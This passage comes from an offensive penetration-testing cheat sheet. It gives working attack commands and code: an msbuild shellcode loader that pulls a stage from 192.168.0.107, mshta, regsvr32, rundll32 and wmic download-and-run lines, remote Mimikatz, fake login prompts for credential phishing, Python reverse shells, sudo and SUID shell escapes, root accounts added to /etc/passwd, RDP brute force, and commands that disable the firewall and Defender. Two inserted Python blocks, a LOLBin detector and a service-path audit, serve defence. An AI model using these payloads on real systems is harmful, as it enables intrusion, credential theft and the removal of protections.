            return ZKSAAFwxgSDnTW;
        }

        // Copy the stage into a private executable heap and run it in a new thread.
        static void TOdKEwPYRUgJly(byte[] KNCtlJWAmlqJ)
        {
            if (KNCtlJWAmlqJ != null)
            {
                UInt32 uuKxFZFwog = HeapCreate(0x00040000, (UInt32)KNCtlJWAmlqJ.Length, 0);
                UInt32 sDPjIMhJIOAlwn = HeapAlloc(uuKxFZFwog, 0x00000008, (UInt32)KNCtlJWAmlqJ.Length);
                RtlMoveMemory(sDPjIMhJIOAlwn, KNCtlJWAmlqJ, (UInt32)KNCtlJWAmlqJ.Length);
                UInt32 ijifOEfllRl = 0;
                IntPtr ihXuoEirmz = CreateThread(0, 0, sDPjIMhJIOAlwn, IntPtr.Zero, 0, ref ijifOEfllRl);
                WaitForSingleObject(ihXuoEirmz, 0xFFFFFFFF);
            }
        }

        public static void QYJOTklTwn()
        {
            byte[] ZKSAAFwxgSDnTW = null;
            ZKSAAFwxgSDnTW = HMSjEXjuIzkkmo("192.168.0.107", 12138);
            TOdKEwPYRUgJly(ZKSAAFwxgSDnTW);
        }
    }
}

          Msbuild

https://gitee.com/RichChigga/msbuild-exec
Start the MSF listener
>C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe 1.xml
1.xml
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="iJEKHyTEjyCU">
    <xUokfh />
  </Target>
  <UsingTask TaskName="xUokfh" TaskFactory="CodeTaskFactory" AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll">
    <Task>
      <Code Type="Class" Language="cs"><![CDATA[
using System;
using System.Net;
using System.Net.Sockets;
using System.Linq;
using System.Runtime.InteropServices;
using System.Threading;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;

// MSBuild compiles and runs this inline task when the target executes.
public class xUokfh : Task, ITask
{
    [DllImport("kernel32")] private static extern UInt32 VirtualAlloc(UInt32 ogephG, UInt32 fZZrvQ, UInt32 nDfrBaiPvDyeP, UInt32 LWITkrW);
    [DllImport("kernel32")] private static extern IntPtr CreateThread(UInt32 qEVoJxknom, UInt32 gZyJBJWYQsnXkWe, UInt32 jyIPELfKQYEVZM, IntPtr adztSLHGJiurGO, UInt32 vjSCprCJ, ref UInt32 KbPukprMQXUp);
    [DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr wVCIQGmqjONiM, UInt32 DFgVrE);

    // Fetch the length-prefixed stage from the handler.
    static byte[] VYcZlUehuq(string IJBRrBqhigjGAx, int XBUCexXIrGIEpe)
    {
        IPEndPoint DRHsPzS = new IPEndPoint(IPAddress.Parse(IJBRrBqhigjGAx), XBUCexXIrGIEpe);
        Socket zCoDOd = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
        try { zCoDOd.Connect(DRHsPzS); }
        catch { return null; }
        byte[] OCrGofbbWRVsFEl = new byte[4];
        zCoDOd.Receive(OCrGofbbWRVsFEl, 4, 0);
        int auQJTjyxYw = BitConverter.ToInt32(OCrGofbbWRVsFEl, 0);
        byte[] MlhacMDOKUAfvMX = new byte[auQJTjyxYw + 5];
        int GFtbdD = 0;
        while (GFtbdD < auQJTjyxYw)
        {
            GFtbdD += zCoDOd.Receive(MlhacMDOKUAfvMX, GFtbdD + 5, (auQJTjyxYw - GFtbdD) < 4096 ? (auQJTjyxYw - GFtbdD) : 4096, 0);
        }
        byte[] YqBRpsmDUT = BitConverter.GetBytes((int)zCoDOd.Handle);
        Array.Copy(YqBRpsmDUT, 0, MlhacMDOKUAfvMX, 1, 4);
        MlhacMDOKUAfvMX[0] = 0xBF;
        return MlhacMDOKUAfvMX;
    }

    // Copy the stage into executable memory and run it in a new thread.
    static void NkoqFHncrcX(byte[] qLAvbAtan)
    {
        if (qLAvbAtan != null)
        {
            UInt32 jrYMBRkOAnqTqx = VirtualAlloc(0, (UInt32)qLAvbAtan.Length, 0x1000, 0x40);
            Marshal.Copy(qLAvbAtan, 0, (IntPtr)(jrYMBRkOAnqTqx), qLAvbAtan.Length);
            IntPtr WCUZoviZi = IntPtr.Zero;
            UInt32 JhtJOypMKo = 0;
            IntPtr UxebOmhhPw = IntPtr.Zero;
            WCUZoviZi = CreateThread(0, 0, jrYMBRkOAnqTqx, UxebOmhhPw, 0, ref JhtJOypMKo);
            WaitForSingleObject(WCUZoviZi, 0xFFFFFFFF);
        }
    }

    public override bool Execute()
    {
        byte[] uABVbNXmhr = null;
        uABVbNXmhr = VYcZlUehuq("192.168.0.107", 12138);
        NkoqFHncrcX(uABVbNXmhr);
        return true;
    }
}
]]></Code>
    </Task>
  </UsingTask>
</Project>

          Winrm

Start the MSF listener
>mkdir winrm
>copy c:\Windows\System32\cscript.exe winrm
Create the file WsmPty.xsl and paste the payload into it
<?xml version='1.0'?>
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd");
]]>
</ms:script>
</stylesheet>
Run:
>cscript.exe //nologo C:\Windows\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty

          Mshta

>use exploit/windows/misc/hta_server
>set srvhost 192.168.0.107
>mshta http://192.168.0.107:8080/RgNeCv.hta
Run VBScript
>mshta vbscript:CreateObject("Wscript.Shell").Run("calc.exe",0,true)(window.close)
Run JS
>mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im mshta.exe",0,true);}
JSRat
>mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.2.101:9998/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im mshta.exe",0,true);}

          Regsvr32

Get an Empire session
>usestager windows/launcher_sct
Generate the sct file and put it in the web directory
>regsvr32 /s /n /u /i:http://192.168.0.107:8080/launcher.sct scrobj.dll
>cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:http://192.168.0.107/test.sct

          Rundll32

Run a file
>rundll32 url.dll, OpenURL file://c:\windows\system32\calc.exe
>rundll32 url.dll, OpenURLA file://c:\windows\system32\calc.exe
>rundll32 url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
>rundll32 url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
>rundll32 url.dll, FileProtocolHandler calc.exe
Run without a window
>rundll32 javascript:"\..\mshtml,RunHTMLApplication ";new%20ActiveXObject("WScript.Shell").Run("C:/Windows/System32/mshta.exe http://192.168.0.107:8080/SU8Fd6kNRz0.hta",0,true);self.close();
Add or delete registry entries
Save the following as a .inf file
>rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:/reg.inf
[Version]
Signature="$WINDOWS NT$"
[DefaultInstall]
AddReg=AddReg
DelReg=DelReg
[AddReg]    ; to delete instead, use DelReg and remove the highlighted part before running
HKLM,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,SYSTEM,0x00000000,c:/windows/temp/sv.exe
0x00010001 means the REG_DWORD data type; 0x00000000, or omitting the field (keeping the comma), means REG_SZ (string)
Write a file
>rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";fso=new%20ActiveXObject("Scripting.FileSystemObject");a=fso.CreateTextFile("c:\\Temp\\testfile.txt",true);a.WriteLine("Test");a.Close();self.close();
Out-RundllCommand
Use the nishang script Out-RundllCommand to generate the rundll command
>powershell -nop -w h -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Execution/Out-RundllCommand.ps1'); Out-RundllCommand -Reverse -IPAddress 192.168.0.107 -Port 12345"

Note: older PowerShell versions only accept -w hidden to hide the window; newer versions also accept -w h
Run a remote PS script
>Out-RundllCommand -PayloadURL http://192.168.0.107/Invoke-PowerShellUdp.ps1 -Arguments "Invoke-PowerShellUdp -Reverse -IPAddress 192.168.0.107 -Port 12138"
Get an MSF session: generate a psh-reflection format script
>rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();r=new%20ActiveXObject("WScript.Shell").run("powershell -w hidden -nologo -noprofile -ep bypass IEX ((New-Object Net.WebClient).DownloadString('http://192.168.0.107/xx.ps1'));",0,true);

          DotNetToJScript

Run .NET assemblies via js/vbs
https://github.com/tyranid/DotNetToJScript/releases
>DotNetToJScript.exe -o 1.js ExampleAssembly.dll    generate js
>DotNetToJScript.exe -l vbscript -o 2.vbs ExampleAssembly.dll    generate vbs
>DotNetToJScript.exe -l vba -o 2.txt ExampleAssembly.dll    generate vba
>DotNetToJScript.exe -u -o 3.sct ExampleAssembly.dll    generate sct
StarFighters
https://github.com/Cn33liz/StarFighters    runs PowerShell code; see the project for details
Run a single command:
$code = 'start calc.exe'
$bytes  = [System.Text.Encoding]::UNICODE.GetBytes($code);
$encoded = [System.Convert]::ToBase64String($bytes)
$encoded
Copy the output as the value of var EncodedPayload
Run mimikatz remotely:
powershell IEX "(New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/powersploit/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -Command 'log privilege::debug sekurlsa::logonpasswords'"
Save the above in code.txt
$code = Get-Content -Path code.txt
$bytes  = [System.Text.Encoding]::UNICODE.GetBytes($code);
$encoded = [System.Convert]::ToBase64String($bytes)
$encoded | Out-File 2.txt
Replace the value of var EncodedPayload with the contents of the generated 2.txt, then run it

Run with AMSI bypassed
>copy c:\windows\system32\cscript.exe amsi.dll
>amsi.dll evil.js

          WMIC

Set up an Empire listener, generate the xsl file with the windows/launcher_xsl module and save it in the web directory
>wmic process get brief /format:http://192.168.0.107:8080/launcher.xsl
It can also be combined with mshta:
<?xml version='1.0'?>
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("mshta http://192.168.0.107:8080/RgNeCv.hta");
]]>
</ms:script>
</stylesheet>

          Msxsl

Download: https://www.microsoft.com/en-us/download/details.aspx?id=21714
Run shellcode remotely: https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker/blob/master/shellcode.xml
>msxsl.exe http://192.168.0.107/shellcode.xml http://192.168.0.107/shellcode.xml
Generate the shellcode with Empire and paste it at the EncodedPayload position in the script

          CPL

Start the listener on Kali
Compile as a DLL
Run via control
>control C:\Users\Administrator.DC\Desktop\VC6.0green\MyProjects\dll\Debug\dll.dll
Or rename the DLL extension to .cpl and double-click it, or run it with rundll32
>rundll32.exe shell32.dll,Control_RunDLL C:\Users\Administrator.DC\Desktop\VC6.0green\MyProjects\dll\Debug\dll.dll
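Detection-side view of this Whitelist section, added here and not part of the original notes: it classifies process command lines against the signed-binary execution paths listed above (cmstp, regsvr32, mshta, rundll32, msiexec, odbcconf, InstallUtil, regasm, the workflow compiler, msbuild, wmic, cscript, msxsl, control and the PowerShell download cradle). Input records mimic Windows 4688 / Sysmon Event ID 1 command lines; the rule set, rule names and sample lines are this example's own.

```python
"""Classify process-creation command lines against the LOLBin execution paths
collected in this section.  The sample events are constructed; a real feed
would be Sysmon Event ID 1 or Security 4688 with command-line auditing on."""
from __future__ import annotations

import re

# (rule name, image file names it applies to, regex the arguments must match)
RULES: list[tuple[str, frozenset[str], str]] = [
    ("cmstp_inf_install", frozenset({"cmstp.exe"}), r"(?i)/s\b.*\.inf\b"),
    ("regsvr32_remote_scriptlet", frozenset({"regsvr32.exe"}),
     r"(?i)(?=.*/i:\s*\S*https?://)(?=.*scrobj\.dll)"),
    ("mshta_inline_or_remote", frozenset({"mshta.exe"}),
     r"(?i)\b(javascript|vbscript):|https?://"),
    ("rundll32_script_or_inf", frozenset({"rundll32.exe"}),
     r"(?i)javascript:|url\.dll\s*,\s*(OpenURLA?|FileProtocolHandler)\b"
     r"|setupapi\s*,\s*InstallHinfSection|shell32\.dll\s*,\s*Control_RunDLL\s+\S*\.dll\b"),
    ("msiexec_remote_or_dll", frozenset({"msiexec.exe"}),
     r"(?i)/i\s+https?://|(^|\s)/y\s+\S+"),
    ("odbcconf_regsvr", frozenset({"odbcconf.exe"}), r"(?i)/a\s*\{\s*regsvr\b"),
    ("installutil_uninstall", frozenset({"installutil.exe"}), r"(?i)(^|\s)/u(\s|$)"),
    ("regasm_unregister", frozenset({"regasm.exe"}), r"(?i)(^|\s)/u(\s|$)"),
    ("workflow_compiler", frozenset({"microsoft.workflow.compiler.exe"}), r""),
    ("msbuild_inline_task_project", frozenset({"msbuild.exe"}), r"(?i)\.xml(\s|$)"),
    ("wmic_remote_xsl", frozenset({"wmic.exe"}), r"(?i)/format:\s*\"?https?://"),
    ("cscript_winrm_or_pubprn", frozenset({"cscript.exe", "wscript.exe"}),
     r"(?i)winrm\.vbs|pubprn\.vbs.*script:https?://"),
    ("msxsl_remote", frozenset({"msxsl.exe"}), r"(?i)https?://"),
    ("control_loads_dll", frozenset({"control.exe"}), r"(?i)\.dll(\s|$)"),
    ("powershell_download_cradle", frozenset({"powershell.exe", "pwsh.exe"}),
     r"(?i)DownloadString\(|(^|\s)-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}"),
]

# First token (quoted or bare) is the image, the remainder the arguments.
_CMD_RE = re.compile(r'^\s*(?:"([^"]+)"|(\S+))\s*(.*)$', re.S)


def split_command_line(cmdline: str) -> tuple[str, str]:
    """Return (lower-case image file name, argument string)."""
    m = _CMD_RE.match(cmdline)
    if not m:
        return "", ""
    exe = (m.group(1) or m.group(2)).lower()
    name = re.split(r"[\\/]", exe)[-1]
    if not name.endswith(".exe"):
        name += ".exe"  # 'rundll32 url.dll,...' is logged as rundll32.exe
    return name, m.group(3)


def classify(cmdline: str) -> list[str]:
    """Names of every rule this command line trips (empty list if benign)."""
    name, args = split_command_line(cmdline)
    return [rule for rule, images, pattern in RULES
            if name in images and re.search(pattern, args)]


def scan(events: list[dict]) -> list[dict]:
    """Apply classify() to a batch of process-creation records."""
    out = []
    for ev in events:
        for rule in classify(ev["CommandLine"]):
            out.append({"rule": rule, "parent": ev.get("ParentImage", ""),
                        "command_line": ev["CommandLine"]})
    return out


# Constructed sample records; the command lines mirror the ones in this section.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmstp /s run.inf"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"regsvr32 /s /n /u /i:http://192.168.0.107:8080/launcher.sct scrobj.dll"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'"C:\Windows\System32\rundll32.exe" url.dll,OpenURL file://c:\windows\system32\calc.exe'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\y\Desktop\y.exe"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"wmic process get brief /format:http://192.168.0.107:8080/launcher.xsl"},
    # Benign: a local installer run and a text editor.
    {"ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'msiexec /i "C:\Users\alice\Downloads\tool.msi" /qn'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"notepad.exe C:\Users\alice\notes.txt"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f['rule']}] parent={f['parent']} :: {f['command_line']}")
```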

          Runas

          #use exploit/windows/local/ask

Token theft

          MSF

Meterpreter>use incognito
Meterpreter>list_tokens -u
Meterpreter>impersonate_token name\\administrator
Meterpreter>ps
Meterpreter>steal_token pid

          Cobalt strike

beacon> steal_token 1234    steal a token
beacon> rev2self    revert to the original token
Windows: https://gitee.com/RichChigga/incognito2

Credential theft

Fake lock screen

          https://github.com/Pickfordmatt/SharpLocker/releases
          https://github.com/bitsadmin/fakelogonscreen/releases
The captured passwords are saved in %LOCALAPPDATA%\Microsoft\user.db

Fake authentication prompt

          CredsLeaker
https://github.com/Dviros/CredsLeaker
Upload cl_reader.php, config.php and config.cl to the web server, then edit the URL parameter in CredsLeaker.ps1 and run.bat
The prompt closes automatically once the correct password is entered; otherwise it can only be closed by killing the powershell process. Once the correct password is captured, creds.txt is written to the directory with the credentials.
LoginPrompt
>powershell.exe -nop -exec bypass -c "IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/ps/Invoke-LoginPrompt.ps1');invoke-LoginPrompt"
Unless the process is killed, the dialog can only be dismissed by entering the correct password; the result is returned once the correct password is received.
Nishang-Invoke-CredentialsPhish
>powershell.exe -nop -exec bypass -c "IEX(New-Object net.webclient).DownloadString('http://192.168.0.108/ps/nishang/Gather/Invoke-CredentialsPhish.ps1'); Invoke-CredentialsPhish"

          RottenPotato

https://github.com/foxglovesec/RottenPotato
Meterpreter>use incognito
Meterpreter>list_tokens -u
Meterpreter>upload /root/Desktop/rottenpotato.exe
Meterpreter>execute -HC -f rottenpotato.exe
Meterpreter>impersonate_token "NT AUTHORITY\\SYSTEM"

          PowerUp

Check for vulnerable services
>powershell.exe -nop -exec bypass -c "IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/ps/powertools/PowerUp/PowerUp.ps1');Invoke-AllChecks"
>icacls C:\Windows\system32\\wlbsctrl.dll    view file permissions: F is full control, M is modify
The AbuseFunction field shows the exploitation command.
>powershell.exe -nop -exec bypass -c "IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/ps/powertools/PowerUp/PowerUp.ps1'); Write-HijackDll -OutputFile 'C:\Windows\system32\\wlbsctrl.dll' -Command 'net user admin pass@Qwe1 /add&net localgroup administrators admin /add'"
After a reboot the user admin is added
Find processes that may be hijackable
>Find-ProcessDLLHijack
Find directories in the PATH environment variable that the current user can modify
>Find-PathDLLHijack
Find autologon credentials stored in the registry
>Get-RegistryAutoLogon
Query trusted_service_path
>Get-ServiceUnquoted
Query registry autorun entries the current user can modify
>Get-ModifiableRegistryAutoRun
Query scheduled task files the current user can modify
>Get-ModifiableScheduledTaskFile
Query plaintext passwords in every web.config on the system
>Get-WebConfig

          Powerup-AlwaysInstallElevated

          >powershell.exe -nop -exec bypass -c "IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/ps/powertools/PowerUp/PowerUp.ps1');Get-RegAlwaysInstallElevated"
          >powershell.exe -nop -exec bypass -c "IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/ps/powertools/PowerUp/PowerUp.ps1'); Write-UserAddMSI"    (a standard user then runs the generated installer)


          AlwaysInstallElevated privilege escalation

          >reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
          >reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
          A value of 1 means installers always run with elevated privileges.
          #HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer: create DWORD32 DisableMSI=0
          #msfvenom -p windows/adduser USER=msi PASS=pass@123 -f msi -o /root/add.msi
          #upload /root/add.msi c:\\1.msi
          >msiexec /quiet /qn /i c:\1.msi
          MSF:
          #use exploit/windows/local/always_install_elevated
          #set session 1

          Trusted Service Paths

          >wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
          Lists auto-start services whose binary path is not wrapped in quotes.
          #use exploit/windows/local/trusted_service_path
          #set session 1
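          Added example, not part of the original notes: a Python audit that applies the same unquoted-path test to the output of `wmic service get name,pathname,startmode /format:csv` and lists the paths Windows would try before the real binary, which are the locations a defender must keep unwritable by ordinary users. The CSV sample below is constructed.

```python
import csv
import re
from typing import Dict, List

# Constructed sample of "wmic service get name,pathname,startmode /format:csv" output
# (blank first line, then a header row).  Not taken from any real host.
SAMPLE_WMIC_CSV = """
Node,Name,PathName,StartMode
HOST1,GoodSvc,"C:\\Program Files\\Good Vendor\\good.exe" -run,Auto
HOST1,BadSvc,C:\\Program Files\\Bad Vendor\\Sub Dir\\bad.exe -service,Auto
HOST1,Spooler,C:\\Windows\\System32\\spoolsv.exe,Auto
HOST1,ManualSvc,C:\\Tools\\My Tool\\tool.exe,Manual
HOST1,NoSpaceSvc,C:\\Tools\\tool.exe,Auto
"""


def parse_wmic_csv(text: str) -> List[Dict[str, str]]:
    """Parse wmic /format:csv output into one dict per service, keyed by column name.
    wmic never quotes fields, so QUOTE_NONE keeps the quotes inside PathName intact
    (a PathName containing a comma would be split wrongly; not handled here)."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    return list(csv.DictReader(lines, quoting=csv.QUOTE_NONE))


def binary_path(pathname: str) -> str:
    """Return just the executable part of a service path (arguments stripped)."""
    p = pathname.strip()
    if p.startswith('"'):                      # quoted: everything up to the closing quote
        end = p.find('"', 1)
        return p[1:end] if end > 0 else p[1:]
    m = re.search(r"\.exe", p, re.IGNORECASE)  # unquoted: up to the first .exe
    return p[: m.end()] if m else p.split(" ")[0]


def is_unquoted_with_spaces(pathname: str) -> bool:
    """The condition the wmic one-liner above approximates with findstr."""
    p = pathname.strip()
    return not p.startswith('"') and " " in binary_path(p)


def lookup_order(path: str) -> List[str]:
    """Executables the service control manager would try, in order, before the
    real one when the path is unquoted: the prefix before each space plus .exe."""
    return [path[:i] + ".exe" for i, ch in enumerate(path) if ch == " "]


def audit_services(services: List[Dict[str, str]], auto_only: bool = True,
                   skip_windows_dir: bool = True) -> List[Dict[str, object]]:
    """Mirror the filters of the wmic one-liner: auto-start services outside C:\\Windows."""
    findings = []
    for svc in services:
        raw = svc.get("PathName") or ""
        if auto_only and (svc.get("StartMode") or "").lower() != "auto":
            continue
        exe = binary_path(raw)
        if skip_windows_dir and exe.lower().startswith("c:\\windows\\"):
            continue
        if is_unquoted_with_spaces(raw):
            findings.append({"name": svc["Name"], "path": exe,
                             "lookup_order": lookup_order(exe)})
    return findings


if __name__ == "__main__":
    for f in audit_services(parse_wmic_csv(SAMPLE_WMIC_CSV)):
        print(f["name"], "->", f["path"])
        for candidate in f["lookup_order"]:
            # none of these must be creatable by a non-admin user; the fix is to quote
            # the path, e.g.  sc config <name> binPath= "\"C:\...\bad.exe\" -service"
            print("   would try first:", candidate)
```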

          Vulnerable Services

          #use exploit/windows/local/service_permissions#set session 1

          Sudo privilege escalation

          /home/user/.sudo_as_admin_successful
          >sudo zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c /bin/bash"
          >sudo tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/bash
          >sudo strace -o /dev/null /bin/bash
          >sudo nmap --interactive
          nmap> !sh
          >echo "os.execute('/bin/sh')" > /tmp/1.nse
          >sudo nmap --script=/tmp/1.nse
          >sudo more/less/man /etc/rsyslog.conf
          >sudo git help status
          >!/bin/bash
          >sudo ftp
          >!/bin/bash
          >sudo vim -c '!sh'
          >sudo find /bin/ -name ls -exec /bin/bash \;
          >sudo awk 'BEGIN {system("/bin/sh")}'

          Linux cron jobs

          >for user in $(getent passwd|cut -f1 -d:); do echo "### Crontabs for $user ####"; crontab -u $user -l; done    (list every user's crontab)
          $cat /etc/crontab
          $echo 'echo "ignite ALL=(root) NOPASSWD: ALL" > /etc/sudoers' >test.sh
          $echo "" > "--checkpoint-action=exec=sh test.sh"
          $echo "" > --checkpoint=1
          Or edit a writable cron job script:
          #!/usr/bin/python
          import os,subprocess,socket
          s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
          s.connect(("192.168.0.107",5555))
          os.dup2(s.fileno(),0)
          os.dup2(s.fileno(),1)
          os.dup2(s.fileno(),2)
          p=subprocess.call(["/bin/sh","-i"])

          Linux SUID privilege escalation

          Find SUID files owned by root:
          $find / -perm -u=s -type f 2>/dev/null
          $find / -user root -perm -4000 -print 2>/dev/null
          $find / -user root -perm -4000 -exec ls -ldb {} \;

          Find

          $touch xxx
          $/usr/bin/find xxx -exec whoami \;
          $/usr/bin/find xxx -exec python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.2",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' \;
          Alternatively:
          >find xxx -exec netcat -lvp 12138 -e /bin/sh \;    (then connect from the attacking machine)

          NMAP

          # enter nmap's interactive mode
          >nmap --interactive
          >!sh

          VIM

          >vim.tiny /etc/shadow
          Alternatively:
          >vim.tiny
          # press ESC, then:
          :set shell=/bin/sh
          :shell

          BASH

          >bash -p

          More/Less/Man

          >less /etc/passwd
          !/bin/sh
          >more /etc/passwd
          !/bin/bash
          >man passwd
          !/bin/bash

          CP/MV

          Overwrite the shadow file

          Linux /etc/passwd privilege escalation

          $ls -lh /etc/passwd    (check whether it is readable and writable by any user)
          $perl -le 'print crypt("password@123","addedsalt")'    (generate a password hash)
          $echo "test:advwtv/9yU5yQ:0:0:User_like_root:/root:/bin/bash" >>/etc/passwd
          Add a root user with a single command:
          #useradd -p `openssl passwd -1 -salt 'user' 123qwe` -u 0 -o -g root -G root -s /bin/bash -d /home/user venus    (username venus, password 123qwe)
          #useradd newuser;echo "newuser:password"|chpasswd
          >echo "admin:x:0:0::/:/bin/sh" >> /etc/passwd
          >passwd admin    (set the password)

          Linux Dirty COW privilege escalation

          https://github.com/FireFart/dirtycow
          $gcc -pthread dirty.c -o dirty -lcrypt
          $./dirty passwd    (generates an account and password)
          https://github.com/gbonacini/CVE-2016-5195
          $make
          $./dcow -s

          RDP & Firewall

          Brute force

          Brute-force RDP with Hydra:
          >hydra -l admin -P /root/Desktop/passwords -S 192.168.0.0 rdp
          Alternatively: Nlbrute

          Enable via the registry

          Check whether the system allows 3389 remote connections:
          >REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections
          1 means disabled, 0 means enabled.
          Check the remote connection port:
          >REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber
          Enabling 3389 remote connections on the local machine, via cmd:
          >REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
          >REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x00000d3d /f
          Via a .reg file with the following content:
          Windows Registry Editor Version 5.00
          [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
          "fDenyTSConnections"=dword:00000000
          [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
          "PortNumber"=dword:00000d3d
          Import the registry file:
          regedit /s a.reg

          Enable the service with NETSH

          >netsh firewall set service remoteadmin enable
          >netsh firewall set service remotedesktop enable
          >netsh firewall set opmode disable    (turn off the firewall)

          Enable via an injection point

          .asp?id=100;exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;--
          Note: a changed connection port only takes effect after a reboot.

          Enable with MSF

          #run post/windows/manage/enable_rdp

          Enable with Wmic

          >wmic /node:192.168.1.2 /USER:administrator PATH win32_terminalservicesetting WHERE (__Class!="") CALL SetAllowTSConnections 1

          Firewall

          Allow inbound connections. If Remote Desktop Services has never been configured on the system, a firewall rule allowing port 3389 must also be added the first time it is enabled:
          >netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
          >netsh firewall set portopening TCP 3389 ENABLE
          Turn off the firewall:
          >netsh firewall set opmode mode=disable
          >netsh advfirewall show allprofiles    (show the status)
          >netsh advfirewall set allprofiles state off
          >sc stop windefend
          >sc delete windefend
          PS> Set-MpPreference -DisableRealtimeMonitoring 1
          PS> Set-MpPreference -Disablearchivescanning $true

          Multiple concurrent logins

          Allow multiple users to log in with Mimikatz:
          >privilege::debug
          >ts::multirdp
          rdpwrap
          https://github.com/stascorp/rdpwrap
          >RDPWInst.exe -i is

          RDP connection history

          https://github.com/3gstudent/List-RDP-Connections-History
          View the RDP connection history of the local machine's users:
          >Psloggedon.exe username

          Remove traces

          @echo off
          @reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
          @del "%USERPROFILE%\My Documents\Default.rdp" /a
          @exit

          Port mapping & forwarding

          MSF

          Requirement: the server can reach the internet and you have a public IP of your own.
          >portfwd add -l 5555 -p 3389 -r 172.16.86.153    (forward the target host's 3389 Remote Desktop port to local port 5555)
          >portfwd list

          lcx.exe

          Requirement: the server can reach the internet and you have a public IP of your own.
          Target: lcx.exe -slave <public IP> 9999 127.0.0.1 3389
          Linux attacking machine: ./portmap -m 2 -p1 9999 -p2 33889
          Windows attacking machine: lcx -listen 9999 33889    (relay what is received on local port 9999 to port 33889)
          PortTran
          https://github.com/k8gege/K8tools/raw/master/PortTran.rar
          Run on the attacking machine:
          >PortTranS20.exe 12345 389
          Run on the target:
